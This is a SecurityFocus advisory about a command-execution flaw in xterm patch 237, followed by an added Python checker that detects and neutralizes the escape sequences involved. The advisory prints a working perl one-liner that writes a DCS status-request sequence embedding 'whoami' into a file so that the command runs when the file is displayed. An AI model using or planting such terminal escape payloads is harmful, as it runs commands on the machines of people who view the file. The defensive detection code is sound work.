source: https://www.securityfocus.com/bid/33060/info

The 'xterm' program is prone to a remote command-execution vulnerability because it fails to sufficiently validate user input.

Successfully exploiting this issue would allow an attacker to execute arbitrary commands on an affected computer in the context of the affected application.

The issue affects xterm with patch 237; other versions may also be affected.

The following example is available:

perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log
cat bla.log
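A defensive check for files like the one produced above, as an added example that is not part of the original advisory: it scans untrusted bytes for DCS strings (ESC P ... ESC \), flags status-request ($q, DECRQSS) bodies that embed newlines, and rewrites control bytes so the file can be displayed without the terminal interpreting them. The function names and the surrounding log lines in the sample are constructed for illustration.

```python
import re

# 7-bit DCS string: introducer ESC P, body, terminator ST (ESC \).
# An unterminated string is treated as running to the end of the input.
# Assumption: the 8-bit C1 forms (0x90 ... 0x9c) are not covered here.
DCS = re.compile(rb"\x1bP(.*?)(?:\x1b\\|\Z)", re.DOTALL)

# C0 controls other than tab/LF/CR, plus DEL: not needed to read a text log.
UNSAFE = re.compile(rb"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")


def find_dcs(data: bytes):
    """Return one finding per DCS string found in data."""
    findings = []
    for m in DCS.finditer(data):
        body = m.group(1)
        findings.append({
            "offset": m.start(),
            # "$q" opens a status request, as in the advisory's example.
            "status_request": body.startswith(b"$q"),
            # Line breaks inside the body are what make the example dangerous.
            "has_newline": b"\n" in body or b"\r" in body,
            "body": body,
        })
    return findings


def neutralize(data: bytes) -> bytes:
    """Rewrite control bytes as visible \\xNN text before display."""
    return UNSAFE.sub(lambda m: b"\\x%02x" % m.group()[0], data)


# Constructed sample: the bytes the advisory's perl one-liner writes,
# placed between two made-up log lines.
SAMPLE = (b"GET /index.html 200\n"
          b"\x1bP$q\nwhoami\n\x1b\\"
          b"GET /about.html 200\n")

if __name__ == "__main__":
    for finding in find_dcs(SAMPLE):
        print(finding)
    print(neutralize(SAMPLE).decode("ascii"), end="")
```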